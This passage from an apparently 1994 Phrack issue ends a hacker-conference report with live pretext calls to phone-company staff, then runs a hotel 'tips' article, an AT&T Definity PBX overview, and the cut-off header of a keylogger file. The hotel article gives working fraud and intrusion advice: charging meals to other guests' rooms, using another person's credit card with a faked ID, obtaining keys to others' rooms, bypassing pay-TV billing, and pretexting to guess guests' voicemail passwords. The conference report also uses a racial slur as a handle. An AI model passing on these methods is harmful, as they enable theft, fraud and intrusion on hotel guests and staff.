800 number and a PIN.

Supernigger  was going to show us how to acquire such  privileged 
information.   Live.  "When you get some phone company person  as 
dumb  as a bolt on the other end, and you know a few buzz  words. 
you convince them that it is in their best interest and that they 
are supposed to give you the information."

"I've never  done this in front of an audience before, so give me 
three  tries," he explained to an anxiously foaming at the  mouth 
crowd.  No one took a cheap pot shot at him: tacit acceptance  of 
his rules.

Ring. Ring. 

"Operations.  Mary."

"Mary.  Hi, this is Don Brewer in social engineering over at CIS, 
how's it going?"  Defuse.

"Oh, fine. I guess."

"I know, I hate working Sundays.  Been busy?"

"Nah, no more.  Pretty calm.  How can I help you?"

"I'm  doing a verification and I got systems down.  I  just  need 
the C/NA.  You got it handy?"  Long pause.

"Sure,  lemme  look. Ah, it's 313.424.0900."  700  notebooks  ap
peared  out  of  nowhere, accompanied by the sound  of  700  pens 
writing down a now-public phone number.

"Got  it.  Thanks."  The audience is gasping  at  the  stunningly 
stupid  gullibility  of  Mary.  But quiet was  essential  to  the 
mission. 

"Here's  the PIN number while we're at it." Double  gasp.   She's 
offering the supposedly super secret and secure PIN number?   Was 
this event legal?  Had Supernigger gone over the line?

"No, CIS just came up.  Thanks anyway."

"Sure you don't need it?"

"Yeah.  Thanks.  Bye."  Click. No need to press the  issue.   PIN 
access  might  be worth a close look from the  next  computer  DA 
wanna-be.

An  instant  shock wave of cacophonous approval  worked  its  way 
throughout  the  750 seat ballroom in less than  2  microseconds.  
Supernigger  had  just  successfully set himself  as  a  publicly 
ordained  Cyber  Christ of Social Engineering.  His  white  robes 
were on the way.  Almost a standing ovation lasted for the better 
part  of a minute by everyone but the narcs in the  audience.   I 
don't know if they were telco or Feds of whatever, but I do  know 
that they were the stupidest narcs in the city of New York.  This 
pair of dour thirty something Republicans had sphincters so tight 
you could mine diamonds  out of their ass.  

Arms  defiantly and defensively crossed, they were stupid  enough 
to sit in the third row center aisle.  They never cracked a smile 
at some of the most entertaining performances I have seen outside 
of  the giant sucking sound that emanates from Ross Perot's ears.

Agree or disagree with hacking and phreaking, this was funny  and 
unrehearsed ad lib material.  Fools.  So, for fun, I crawled over 
the legs of the front row and sat in the aisle, a bare eight feet 
from the narcs.  Camera in hand I extended the 3000mm  tele-photo 
lens  which can distinguish the color of a  mosquitoes  underwear 
from a kilometer and pointed it in their exact direction.   Their 
childhood  acne scars appeared the depth of the Marianna  Trench.  
Click,  and the flash went off into their eyes, which at  such  a 
short  distance should have caused instant blindness.  But  noth
ing.  No reaction.  Nada. Cold as ice.  Rather disappointing, but 
now  we know that almost human looking narc-bots have  been  per
fected and are being beta tested at hacker cons. 

Emmanuel Goldstein is very funny.  Maybe that's why Ed Markey and 
he  get  along so well.  His low key voice rings  of  a  gentler, 
kinder  sarcasm but has a youthful charm despite that he  is  30-
something himself. 

"Sometimes  you  have to call back.  Sometimes you have  to  call 
over  and  over to get what you want.  You have to keep  in  mind 
that  the people at the other end of the phone are generally  not 
as  intelligent  as a powered down computer."   He  proceeded  to 
prove the point.

Ring ring,

"Directory Assistance."

"Hi."

"Hi."

"Hi."

"Can I help you."

"Yes."

Pause.

"Hello?"

"Hi."

"Hi."

"Can I help you.:

"OK."  

Shhhhh.  Ssshhh.  Quiet.  Shhhh.  Too damned funny for words.

"Directory Assistance."

"I need some information."

"How can I help you."

"Is this where I get numbers?"

"What number would you like?"

"Information."

"This is information."

"You said directory assistance."

"This is."

"But I need information."

"What information do you need?"

"For information."

"This is information."

"What's the number?"

"For what?"

"Information."

"This is directory assistance."

"I need the number for information."

Pause.  Pause.

"What number do you want?"

"For information."

Pause.  Guffaws, some stifled, some less so.  Funny stuff. 

"Hold on please."

Pause.

"Supervisor.  May I help you?"

"Hi."

"Hi."

Pause.

"Can I help you?"

"I need the number for information."

"This is directory assistance."

"Hi."

"Hi."

"What's the number for information?"

"This is information."

"What about directory assistance?"

"This is directory assistance."

"But I need information."

"This is information."

"Oh, OK. What's the number for information?"

Pause.

"Ah 411."

"That's it?"

"No. 555.1212 works too."

"So there's two numbers for information?"

"Yes."

"Which  one  is better?"   How this audience kept  its  cool  was 
beyond me.  Me and my compatriots were beside ourselves.

Pause.

"Neither."

"Then why are there two?"

Pause.

"I don't know."

"OK.  So I can use 411 or 555.1212."

"That's right."

"And which one should I use?"

Pause.

"411 is faster."  Huge guffaws.  Ssshhhh.  Ssshhhh..

"Oh. What about the ones?"

"Ones?"

"The ones."

"Which ones?"

"The ones at the front of the number."

"Oh, those ones.  You don't need ones.  Just 411 or 555.1212.."

"My friends say they get to use ones."  Big laugh.  Shhhhhh.

"That's only for long distance."

"To where?"  How does he keep a straight face?

Pause.

"If you wanted 914 information you'd use a one."

"If I wanted to go where?"

"To 914?"

"Where's that?"

"Westchester."

"Oh, Westchester.  I have friends there."

Pause.

"Hello?"

"Yes?"

"So I use ones?"

"Yes.  A one for the 914 area."

"How?"

Pause.

"Put a one before the number."

"Like 1914. Right?"

"1914.555.1212."

"All of those numbers?"

"Yes."

"That's three ones."

"That's the area code."

"I've  heard about those.  They confuse me."   Rumbling  chuckles 
and laughs throughout the hall. 

Pause.

She  slowly and carefully explained what an area code is  to  the 
howlingly irreverent amusement of the entire crowd except for the 
fool narcs. 

"Thanks.  So I can call information and get a number?"

"That's right."

"And there's two numbers I can use?"

"Yes."

"So I got two numbers on one call?"

"Yeah . . ."

"Wow.  Thanks.  Have a nice day."

* * * * * 

Comments heard around HOPE.

Rop Gongrijjp, Hacktic:  "The local phone companies use their own 
social  engineers  when they can't get their own people  to  tell 
them what they need to know."

Sprint  is  using what they consider to be  the  greatest  access 
mechanism since the guillotine.  For all of us road warriors  out 
there  who are forever needing long distance voice  service  from 
the Whattownisthis, USA airport, Sprint thinks they have a better 
mousetrap.  No more messing finger entry.  No more pass-codes  or 
PIN's.  

I  remember at the Washington National Airport last summer I  was 
using my Cable and Wireless long distance access card and entered 
the PIN and to my surprise, an automated voice came on and  said, 
"Sorry,  you entered your PIN with the wrong finger.  Please  try 
again."

Sprint says they've solved this thorny cumbersome problem with  a 
service  called  "The Voice Fone Card".   Instead  of  memorizing 
another  64 digit long PIN, you just speak into the phone:   "Hi, 
it's me.  Give me dial tone or give me death."  The voice  recog
nition  circuits  masturbate  for a while to  determine  if  it's 
really you or not.   

Good idea.  But according to Strat, not a good execution.   Strat 
found  that someone performing a poor imitation of his voice  was 
enough  to break through the front door with ease.  Even  a  poor 
tape  recording  played back over a cheap  cassette  speaker  was 
sufficient to get through Sprint's new whiz-banger ID system.  

Strat  laughed that Sprint officials said in defense, "We  didn't 
say it was secure: just convenient."  

Smart.  Oh, so smart.

* * * * * 

"If  my  generation of the late 60's and early 70's had  had  the 
same  technology  you guys have there never would  have  been  an 
80's."  This was how I opened my portion of the author's panel.

The authors panel was meant to give HOPE hackers insight into how 
they  are  perceived  from the so-called outside.   I  think  the 
session  achieved that well, and I understand the videos will  be 
available soon.  

The question of electronic transvestites on AOL came up to every
one's enjoyment, and all of us on the panel retorted with a  big, 
"So  what?"  If you have cyber-sex with someone on the  'Net  and 
enjoy  it,  what the hell's the difference?   Uncomfortable  butt 
shifting  on chairs echoed how the largely male  audience  likely 
feels about male-male sex regardless of distance. 

"Imagine,"  I  kinda said, "that is a few years you have  a  body 
suit  which  not only can duplicate your moves exactly,  but  can 
touch you in surprisingly private ways when your suit is connect
ed  to another.  In this VR world, you select the gorgeous  woman 
of choice to virtually occupy the other suit, and then the two of 
you  go  for it.  How do you react when you  discover  that  like 
Lola, 'I know what I am, and what I am is a man and so's  Lola.'"   
Muted  acknowledgment  that  unisex may come  to  mean  something 
entirely different in the not too distant future.

"Ooh, ooh, please call on me."  I don't mean to be insulting, but 
purely  for identification purposes, the woman behind  the  voice 
bordered  on five foot four and four hundred pounds. Her  bathtub 
had stretch marks.

I never called on her but that didn't stop her.

"I want to know what you think of how the democratization of  the 
internet  is affected by the differences between  the  government 
and  the  people who think that freedom of the net  is  the  most 
important thing and that government is fucked but for freedom  to 
be  free  you have to have the democracy behind you  which  means 
that the people and the government need to, I mean, you know, and 
get  along  but the sub culture of the hackers doesn't  help  the 
government but hackers are doing their thing which means that the 
democracy will not work , now I know that people are laughing and 
giggling  (which they were in waves) but I'm serious  about  this 
and I know that I have a bad case of hypomania but the medication 
is working so it's not a bad as it could be.  What do you think?"

I  leaned forward into the microphone and gave the only  possible 
answer.   "I  dunno.  Next."  The thunderous  round  of  applause 
which  followed my in-depth response certainly suggested that  my 
answer was correct.  Not politically, not technically, but  anar
chistically. Flexibility counts.

* * * * * 

HOPE  was attended by around one thousands folks, and  the  Hotel 
Filthadelphia still stands.  (Aw shucks.)  

My single biggest complaint was not that the schedules slipped by 
an  hour or two or three; sessions at conferences like this  keep 
going  if  the  audience is into them and they are  found  to  be 
educational and productive.  So an hour session can run into  two 
if  the  material and presentations fit the mood.   In  theory  a 
boring session could find itself kama kazi'd into early melt-down 
if  you have the monotone bean counter from hell  explaining  the 
distributed  statistical means of aggregate synthetic  transverse 
digitization   in  composite  analogous  integral   fruminations.  
(Yeah, this audience would buy off on that in a hot minute.)  But 
there were not any bad sessions.  The single track plenary  style 
attracted  hundred  of  hackers for every  event.   Emmanuel  and 
friends picked their panels and speakers well.  When dealing with 
sponge-like minds who want to soak up all they can learn, even in 
somewhat of a party atmosphere, the response is bound to be good.  

My single biggest complaint was the registration nightmare.   I'd 
rather go the DMV and stand in line there than get tagged by  the 
seemingly  infinite lines at HOPE.  At DefCon early  registration 
was encouraged and the sign up verification kept simple.

For some reason I cannot thoroughly (or even partially) fathom, a 
two  step  procedure was chosen.  Upon entering, and  before  the 
door narcs would let anyone in, each attendee  had to be assigned 
a piece of red cardboard with a number on it.  For the first  day 
you could enter the 'exhibits' and auditorium without  challenge.  
But by Day 2 one was expected to wait in line for the better part 
of  a week, have a digital picture taken on a computer tied to  a 
CCD  camera,  and then receive a legitimate HOPE  photo-ID  card.  
What  a  mess. I don't have to beat them up on it too  bad;  they 
know the whole scheme was rotten to the core.  

I waited till near  the end of Day 2 when the lines were gone and 
the  show was over.  That's when I got my Photo ID card.  I  used 
the MIB's photo ID card the rest of the time.

HOPE  was a lot of fun and I was sorry to see it end, but as  all 
experiences, there is a certain amount of letdown.  After a great 
vacation, or summer camp, or a cruise, or maybe even after  Wood
stock, a tear welts up.  Now I didn't cry that HOPE was over, but 
an  intense 48 hours with hackers is definitely not your  average 
computer  security convention that only rolls from 9AM  to  Happy 
Hour.   At a hacker conference, you snooze, you lose.  You  never 
know  what is going to happen next - so much is  spontaneous  and 
unplanned  - and it generally is highly educational,  informative 
and entertaining.

Computer  security folks:  you missed an event  worth  attending.  
You  missed some very funny entertainment.  You missed some  fine 
young people dressed in some fine garb.  You missed the chance to 
meet with your perceived 'enemy'.  You missed the opportunity  to 
get  inside  the heads of the generation that  knows  more  about 
keyboards  than  Huck  Finning in suburbia.   You  really  missed 
something,  and  you should join Robert MIB Steele and I  at  the 
next hacker conference.              

* * * * *

If only I had known.
  
If  only I had known that tornadoes had been dancing up and  down 
5th  avenue  I would have stayed at the Hotel  Filthadelphia  for 
another night.  

La  Guardia airport was closed.  Flights were up to 6  hours  de
layed if not out and out canceled.  Thousands of stranded travel
ers hunkered down for the night.  If only I had known.  

Wait, wait. Hours to wait.  And then, finally, a plane ready  and 
willing to take off and swerve and dive between thunderbolts  and 
twisters and set me on my way home.  

My kids were bouncing out of the car windows when my wife  picked 
me up at the airport somewhere in the vicinity of 1AM.  

"Not  too  late are you dear?"  Sweet Southern  Sarcasm  from  my 
Sweet Southern Wife.  

"Don't  blame me," I said in all seriousness.  "It was the  hack
ers.  They caused the whole thing."

* * * * * 

Notice: This article is free, and the author encourages responsi
ble  widespread electronic distribution of the document in  full, 
not  piecemeal.  No fees may be charged for its use.    For  hard 
copy print rights, please contact the author and I'll make you an 
offer  you can't refuse.  The author retains full  copyrights  to 
the contents and the term Cyber-Christ.

Winn is the author of "Terminal Compromise",  a  novel  detailing 
a  fictionalized account of a computer war waged on   the  United 
States.   After selling well as a book-store-book, Terminal  Com
promise  was placed on the Global Network as the  world's   first 
Novel-on-the-Net Shareware and has become an underground classic.  
(Gopher TERMCOMP.ZIP)  

His  new  non-fiction book, "Information Warfare:  Chaos  on  the 
Electronic  Superhighway" is  a compelling, non-technical  analy
sis   of personal privacy, economic and industrial espionage  and 
national  security.   He calls for the creation  of   a  National 
Information Policy,  a  Constitution  in Cyberspace and an  Elec
tronic Bill of Rights.

He   may  be reached at INTER.PACT,  11511  Pine  St.,  Seminole, 
FL.  34642. 813-393-6600, fax 813-393-6361,  E-Mail:
P00506@psilink.com.



--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 24 of 28

****************************************************************************


The ABCs of better  H O T E L   Staying ...

                                       ...  by SevenUp (sec@escape.com)

This ARTICLE will give you some information on how to experience
a cheaper, safer, and more comfortable stay at your next hotel visit.
Always keep in mind that the staff is taught to make your stay
as pleasant as possible and fulfil most of your wishes. So it is often
a matter of social engineering to reach your goal.

BUSINESS CENTRES
Many good hotels offer business centres. Some business centres just offer
"typing service" at high rates, others provide a PC you can use for free.
Usually it is a 286 or older, but it should give you the opportunity
to copy warez, write your latest article for Phrack or even connect your
pocket modem and login to the -> Internet.

CREDIT CARDS
If you have your own card and don't mind paying for the room - great!
Just use it when you check in - most places require you to have a credit
card or won't let you use the phone or won't even let you in.
You want to use someone else's card? Be careful! Don't use a stolen
card when you check in, or you won't have a safe sleep, fearing that they
could come and get you. You would be safer if you tell them upon check in
that you misplaces your card and don't need to make long distance calls,
and just want to pay with it in the end. This doesn't work always, but
sometimes. You also need a faked ID upon check in with the same name as
the cardholder.

But overall, using a faked Credit Card in a hotel is one of the easiest ways
to get busted.

DIALUPS
Many hotels have dialins for their reservation system. Novells are quite
popular. Some hotels also use PC based UNIXes (old System V's mostly)
that are often unprotected - no passwords on the root account or even
giving you a shell prompt when you call the dialup. Most of them are 7e1
at slow speeds. I won't say more about reservation systems here.

EATING & DANCING
Many hotels have good and relatively expensive restaurants and discos.
They just require you to sign the check with a room number and full name.
If you know of a guest that is checked in and has secured his account with
a credit card who just checked in, just use his name and room number -
this is probably the biggest lack of security in a hotel.

Also if you don't stay at the hotel but want to go to their disco at night,
pretend to be a guest to get in free and save cover charges. They usually
believe you.

FUCKING
You've read right, hotels are favorite places to make love. No matter
if you bring your IRC date here, pick up a hooker or stay alone and
watch the in-house porn movies. Since many hotels pride themselves in
having as much staff as guests, the question is how to get the cute
waitresses and maids into your bed. If anyone has experience making
them willing without much financial and physical effort, drop me a
mail and I will include it in the next list.

GET ALL
Some people love to take all movable parts from the room before checking
out. The question is what to take and what not.

The easiest things to take are soaps, shampoo, lotions and Kleenex from
the bathroom, since they will be replaced every morning without problems.
If you want a bathrobe (usually most expensive item), hide it in your
suitcase immediately after check in and then complain that there was just
one robe in your room. They will bring you a new one immediately. If you
take one when you leave the hotel, they will notice and most likely
charge you $100 in your credit card. If you want a bath towel, also don't
wait until the end of your stay, but hide it some days earlier. If anyone
should ask about it, just tell him that you left it at the pool.
Taking magazines from your room is usually no problem, but stay away
from removing the TV or blankets!

HYATT GOLD PASSPORT
If you want to check in at a Hyatt, get yourself their Gold Pass before.
It is free of charge and will get you free Orange Juice, Coffee and a
newspaper in the morning, and also a bigger room.

INTERNET
So you are at a hotel in a new city and want to get on the Internet?
There are usually 2 ways: Using a computer and a modem from your hotel room
and calling a dialup, or walking to a local university and logging in from
there.

If you bring your laptop with built-in modem, find the dialup in the
Internet Dialup list in this issue of Phrack, get an account on the host
and can make free local calls from your room, the first choice is probably
the best one.

But if you don't have your own account at a local school and want to
stay legit, it is often useful to walk to a computer lab in that school
and check out their computers. Many school around the world have PC's
in their labs which let you do a telnet throughout the world without
needing any account or password, or ID to enter the school. You can find
them in Hong Kong, New York, Munich and many other major cities; but usually
they are unknown to the public or are likely to be closed down (similar to the
vending machines, see -> SEVENUP).

JACKING OFF
See -> Fucking.

KEY
There are plenty of different types of room keys. Some hotels still use
old-fashioned standard keys, but most use programmable keys (plastic cards
with "holes" or magnetic stripes, or even the pretty modern metal keys
in key-shape, which allow programming of their magnetic fields. These
programmable keys will always be reprogrammed if a guest checks out.
On the other hand, if you go to the reception and claim that you lost
your key, they will always program a spare key for you. Sometimes they
ask you for your birthday, sometimes for your ID (just tell them you
left it in your room). This way you could easily get into someone else's
room.

LIGHT
Some hotels have quite fancy light systems. If the light won't shine,
there is often a box in the entrance where you have to enter your key
(or some paper) to activate the main power. This should help saving
energy while you are gone, but sometimes even the air condition will
turn off, so you have to fool the box with a paper or spare key.
Some systems will turn on certain lights just when you insert the key
into the door and open it. This is quite unfortunate if your roommate
sleeps while you go cruising and clubbing at night. When you return,
the light will shine bright and wake him up. The only thing that helps
is unscrewing the light bulbs.

MOVIES & TV
I bet many of you will first turn on the TV after entering the room.
Some people just stay at hotels that offer HBO in their rooms.
Before playing with the remote, read the papers above the TV carefully,
because some channels might show in-house movies that are being charged
automatically without any warning. Typical rates are US $6-9 per movie.
Of course you don't want to pay that much, nor do I.

Here are the 3 big S' of movie watching:
     Spectravision, Sex movies and Social Engineering.

Spectravision is one of the most popular systems. It usually allows you
to watch 5 minutes (sometimes 2) of each movie per day free, enough for
some people to come. There are usually a bunch of BNC cables from the
wall to your Spectravision box and to your TV. One of the cables delivers
the program, the other assures billing. Use your fantasy and try replacing
the "billing cable" in the wall! Generally it can also be useful to use
a standard cable decoder (cablebox) to decode the pay channels. Just bring
one along and if you are lucky, you can watch the movies easily.

If all your technical expertise fails, there is still one way of watching
movies for free: Social Engineering. Just watch the movies of your choice
and then complain to the reception that you had trouble with the TV,
that the Spectravision box or remote control broke, or that you caught
the maid watching movies in your room. If you cry a lot, they will usually
be nice and remove the movies from your bill.

PHONE CALLS
Be careful before making any phone calls from your room. Many hotels
charge you up to $3 for 800 numbers and log all your touch tones (and
calling codez!). You can't be sure who will view the logs and abuse your
calling card. Also there are often high surcharges for long distance calls,
up to 40% on top of AT&T's operator connected charges. There are also hotels
that charge a minimum charge per call (up to $5), even if you just talked
for 10 seconds long distance. On the other side, some hotels offer free local
and 800 calls. Just make sure and read all papers in the room and contact
the reception. I also had operators telling me lower rates than the ones that
showed up on my bill, so be careful.

RACK RATE
This is the highest possible rate for a room, and the rate that is officially
displayed at the reception. You should never pay that rate. If you say you
are with a company they will give you a discount of at least 10% (corporate
rate). Some hotels even give qualified people and companies discounts of
25% - 50% on the rack rate. When you wonder if you pay too much for your
room or think you got a great rate, send me a mail, because I try to keep
a database about cheapest prices for selected hotels.

SEVENUP, Coke, Pepsi & Rootbeer:
You are staying at a five-star hotel. You are thirsty. Your room has
a minibar, but the cheapest soda is $4.95. The next supermarket or gas
station is 20 miles away. But you need a Coke. What to do now?

TRY finding the gangways where the employers work, live and eat!
About every bigger hotel has a kitchen for employees. They also have
a vending machine hidden somewhere, with sodas for just 60 cents.

When strolling through the restricted area, just walk straight, slowly
and self confident. If someone asks you what you are doing, tell them:
a) you are an undercover agent for the IRS and they should get lost.
b) you are looking for the vending machine. (telling the truth openly
   with a broad smile can be more successful than you think!)
c) you are a new employee and ask her to show you around

Also notice the signs and posters in most restricted areas, telling
the personnel to be "enthusiastic, punctual, generous to the guest..."
Quote these phrases when an employer behaves nasty towards you.

UPGRADES
After first going into your room and checking it out, go back to
the reception and complain that the bed is too small, the street noise
is too loud, the view is too poor, etc. Quite often they will give you
a nicer and bigger room on their executive floor! See also -> Hyatt
Gold Passport.

VOICE MAIL
Many good hotels offer voice mail to their guests. The most popular
system is Meridian Mail. Some hotels have an own dialup for the voicemail,
but mostly the hotel just lets you access it through the main PBX operator.
If you are unlucky you have to wait 5 rings at a number before the
Voice Mail answers.

Most guests don't use Voice Mail. The few that do also keep the default
password, which is often the room number or the birthday of the guest.
One way to get the birthday is call up front desk, tell them you are
with "Mommy's Birthday Cakes Delivery" and have a cake for John Smith.
Ask them to check birthday's of all John Smith's etc. Of course there
are more ways, just use your social engineering fantasy!

WHERE TO GO?
It is pretty hard to recommend chains in general. But I had quite
good experience with Hilton, Hyatt (try getting a room on the Regency
floor), Holiday Inn (sometimes really cheap prices and good standard),
Shangri-La (best hotels in Asia) and Marriott (usually nice service).
I had less good experience with Sheraton (less discounts), Peninsula,
Regent & Four Seasons (all a bit overpriced and not so modern). But
there are always exceptions, so tell me about your experience!


I hope some of these tips might be useful for you. Stay tuned and wait
for a new issue of travel tips, next time about Airlines!


(c)opyright 1994 by the author. Publication outside of Phrack forbidden.


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 25 of 28

****************************************************************************


                       ================================
                          AT&T Definity System 75/85
                             Communications System
                          Description & Configuration
                       ================================
                              Written By: erudite
                              (armitage@dhp.com)
=====
Intro
=====

Let me introduce you to the AT&T Definity System 75/85.  This communications
system is a product of the merging of the AT&T System 75 and System 85
architectures.  The name Definity came from the two words "definitive" and
"infinity".

Let me also tell you that there are many different communications systems
out there. (Merlins, AT&Ts) Many many many, I couldn't name them all, but
the AT&T systems are nice.  I enjoy working with them, and I hope you enjoy
this text file.

This System is an advanced business communications system.  A Digital
Communications Protocol (DCP) allows data communication through data
terminal equipment connected to the digital switch.  This allows the
system to handle data and voice communications simultaneously.

The System can handle up to 1600 lines that supports all digital, hybrid,
and analog terminals and equipment.  Up to 400 trunks, and up to 400
Automatic Call Distribution (ACD) Agents.  The Data switching capacity is up
to 800 digital data endpoints, and 160 integrated and combined pooled modem
facilities.

  ~ 510D Personal Terminal or 515-Type Business Communications Terminal
  ~ 7404D Terminals
  ~ 7406D or 7407D Equipped with optional Data Module Base
  ~ Asynchronous Data Units (ADU) (DCE type device that has rs232c interface)
  ~ Digital Terminal Data Modules
  ~ 3270 Data Modules
  ~ Internal Data Channels
  ~ Trunk Data Modules (Modular)
  ~ Processor Data Modules (Modular)

==========
Networking
==========

The Processor Port Network (PPN) always provides the switch processing
element (SPE) and port circuits.  An Expansion Port Network (EPN) is
available to increase line size of any system by allowing you to add
additional port circuits.  The EPN connects to the PPN over a fiber
optic cable that may be up to 1.86 miles remotely situated.  It may also
by located adjacent to the PPN.

This System may be arranged stand-alone or you can integrate it into a
private network.  You can form these types of Networks:
        ~ Tandem Tie Trunk Network (TTTN)
        ~ Electronic Tandem Network (ETN)
        ~ Main/Satellite Configuration
        ~ Distributed Communications System (DCS)
        ~ Centralized Attendant Service (CAS)

An Integrated Services Digital Network Primary Rate Interface (ISDN-PRI)
makes it possible for the Definity System to access various private and
public network services.  With ISDN-PRI the you can access these services:
        ~ Call by Call Service Selection
        ~ Private Network Services
        ~ Information Forwarding
        ~ Call Identification Display
          - Connected Number Display
          - Connected Party Name Display
          - Calling and Called Number Record Display
          - Calling and Called Party Name Display

=============
Configuration
=============

The Actual System is encased in a pair of "cabinets" which have a fiber
optic link between them.  It is also common to have a stack of about three
"cabinets" of a smaller size, for different models.

Shown here is a typical multi-carrier system with a Processor Port Network
(PPN) cabinet and Expansion Port Network (EPN) cabinet.

  attendant          outside trunks   _____ outside private line
   consoles            and lines    /        data transmission equipment or
      \                      \    /          analog switched network
        \      fiber optic    |  |
         |      connection    |  |         __ business communication
        -+---------/~\--------+--+       /    terminals
       |   AT&T    | |   AT&T    |      |
       | DEFINITY  | | DEFINITY  +------'                      ___data
    ---+  SYSTEM   | |  SYSTEM   +--------<>------[audix]    /    terminals
  /    |  75/85    | |  75/85    |   modular data          /
 |     |___________| |__________+|     processor     ____ |
manager   |   |                 |                   |    +'optional host
terminal  |   |                 +-------<>----------+    | computer or call
         /    +-------[]-----+,                     |____| management system
       /         asynchronous |
  single line     data unit    \__ data
voice terminals                    terminals


===================
  Voice and Data
Management Features
===================

There are a lot of voice features and services, in fact, too many to list, I
will do a run down on all the interesting and useful features and services.
It has many Voice Management, Data Management, Network Services, System
Management, Hospitality Services, and Call Management Services.

  call attendant can use to operate the console more efficiently
  both inside system users and remote callers to edit, receive, send,
  write, and forward voice messages.
  system.
  it to the display console.
  - Attendant Conference: Allows Attendant to construct a conference call
  - Terminal Conference: Allows remote user to construct a conference call
    without attendant assistance.
  being interrupted by any of the systems overriding features, and denies
  ability to gain access to, and or superimpose tones.
  is issued by the administrator to a certain extension # for indication of
  a dedicated private data extension.
  the system to dial anyone else, such as the attendant console.
  the following trunks and more.
        ~ Voice Grade DS1 Tie Trunks
        ~ Alternative Voice/Data (AVD) DS1 Tie Trunks
        ~ Digital Multiplexed Interface (DMI) Tie Trunks
        ~ Central Office (CO) Trunks
        ~ ISDN-PRI Trunks
        ~ Remote Access Trunks
        ~ Wide Area Telecommunications Service (WATS) Trunks
  features and functions that is used for maintenance testing.  Such as access
  to system tones, access to specific trunks, etc.
        Note: AT&T designed the Facility Test Calls Feature for testing
              purposes only, and system maintenance.  When properly
              administered, AT&T claims that the customer is responsible for
              all security items, and secure system from unauthorized users,
              and that all users should be aware of handling access codes.
              AT&T claims they will take no responsibility for poor
              administration.
  it rings down if busy, or if it receives a dial timeout.
  packet switched local area network that will link with mainframes,
  workstations, personal computers, printers, terminals, storage devices,
  and communication devices.
  This interface allows connection of the system to an ISDN Network by means
  of ISDN frame format called PRI.
  branch has a Listed Directory Number (LDN).
        ~ Common Control Switching Arrangement (CCSA)
        ~ Electronic Tandem Network (ETN)
        ~ Enhanced Private Switched Communications Service (EPSCS)
        ~ Tandem Tie Trunk Network (TTTN)
        ~ Software Defined Network (SDN)
  doesn't want to take responsibility for anything that is abused with this
  feature.
  would come in handy.
  others calls, again, AT&T does not want to take any legal fees on misuse
  on this feature.
  attendant's assistance.

========
Software
========

The System comes with switched services software, administrative software,
and maintenance software.  All running on a real-time operating system.

  and services.  This also is responsible for relaying any information to the
  console display.
  tasks, and configurations.
  keep everything running properly.

=====================
System Administration
=====================

The "Access Code" you will encounter on these systems is a 1, 2, or 3 digit
number. The pound (#) and star (*) keys can be used as the first digit of the
code.  Below you will see a typical Screen Format taken from one of my logs,
information aside you can see and get a feel of what the administration side of
the system is like.                                                                            Page 1 of 4

                               STATION

Extension: ____
Type: _____       Lock Messages: _      COR: _     Room: _____
Port: ___________ Security Code: ____   COS: _     Jack: _____
Name: ___________ Coverage Path: ___              Cable: _____

FEATURE OPTIONS

    LWC Reception? _____  Headset? _  Coverage Msg Retrieval? _
   LWC Activation? _  Auto Answer? _        Data Restriction? _
 Redirect Notification? _        Idle Appearance Preferences? _
PCOL/TEG Call Alerting? _
           Data Module? _           Restrict Last Appearance? _
               Display? _

ABBREVIATED DIALINGS

        List1: _____        List2: _____        List3: _____

BUTTON ASSIGNMENTS

1: _______                     6: _______
2: _______                     7: _______
3: _______                     8: _______
4: _______                     9: _______
5: _______


==================
System Maintenance
==================

Finally the Maintenance section, where you can see where the errors are
logged, where all the alarms are sent, printed, etc.

There are 3 different types of alarms:
  console or INADS)

The Error log is reported and can be viewed at The Manager Terminal,
as well as the alarm log.

==============
Basic Acronyms
==============

ADU     Asynchronous Data Unit
AUDIX   Audio Information Exchange
COR     Class of Restriction
COS     Class of Service
DCP     Digital Communications Protocol
DMI     Digital Multiplexed Interface
EPN     Expansion Port Network
ISDN    Integrated Service Digital Network
PPN     Processor Post Network
PSDN    Packet Switching Data Network

=====
Tones
=====

Here is most of the Tones, mostly either interesting ones or often used
tones the System.  Here are the tones, the frequencies, and the moderations.

Tone                   Frequency          Pattern
----                   ---------          -------
Answer Back 3          2225 Hz            3000 on
Answer Back 5          2225 Hz            5000 on
Bridging Warning       440 Hz             1750 on, 12000 off,
                                          650 on; repeated
Busy                   480 Hz + 620 Hz    500 on, 500 off; repeated
Call Waiting
 Internal              440 Hz             200 on
 External              440 Hz             200 on, 200 off
 Attendant             440 Hz             200 on, 200 off
Priority Call          440 Hz             200 on, 200 off, 200 on,
                                          200 off, 200 on
Call Waiting
 Ring Back             440 Hz + 480 Hz;   900 on (440 + 480)
                       440 Hz             200 on (440) 2900 off; repeated
Cnrt Att Call
 Incoming Call
 Identification       480 Hz & 440 Hz    100 on (480), 100 on (440),
                       & 480 Hz           100 on silence;
 Dial Zero,
 Attendant Transfer,
 Test Calls,           440 Hz             100 on, 100 off, 100 on
 Coverage              440 Hz             600 on
 Confirmation          350 Hz + 400 Hz    100 on, 100 off, 100 on,
                                          100 off, 100 on
 Dial                  250 Hz + 400 Hz    Continuous
 Executive Override    440 Hz             300 on followed by
 Intercept             440 Hz & 620 Hz    250 on (440),
                                          250 on (620); repeated
 Ringback              440 Hz + 480 Hz    1000 on, 3000 off; repeated
 Zip                   480                500 on

=====
Outro
=====

  System 75/85 (multi-carrier cabinet model) communications system.

I hope you learned something, anywayz, questions comments, system login
information, defaults, where to get manuals, or anything else:
email me (armitage@dhp.com) and I will get back to you.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a

mQCNAi4sHnsAAAEEALjw8E+bOEr1BlCyrBp8f3Ko8yOX5P5uiP+Vor5SamJ33gbu
PBSBOc+Xww+93Pjl/R7gMC/c/FFtn+ehHsCm5u3AaIXSmx2ZVW2Xen9vXBRMZRB+
rpC2GdCiFCAdfaHwANHaeuHDmKiP4GqaQuG1M1Xzv9NqW4m70tndGYkB59slAAUT
tAdFcnVkaXRl
=Nx+g
-----END PGP PUBLIC KEY BLOCK-----

erudite (armitage@dhp.com) (armitage on irc)


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 26 of 28

****************************************************************************

                   KEYTRAP v1.0 - Keyboard Key Logger
                      by Dcypher (Dcypher@aol.com)


-------------------------------------------------------------------------
THIS PROGRAM MAY NOT BE DISTRIBUTED IN ANY WAY THAT VIOLATES U.S. OR
FOREIGN LAW.  THIS PROGRAM MUST NOT BE USED TO GAIN UNAUTHORIZED ACCESS
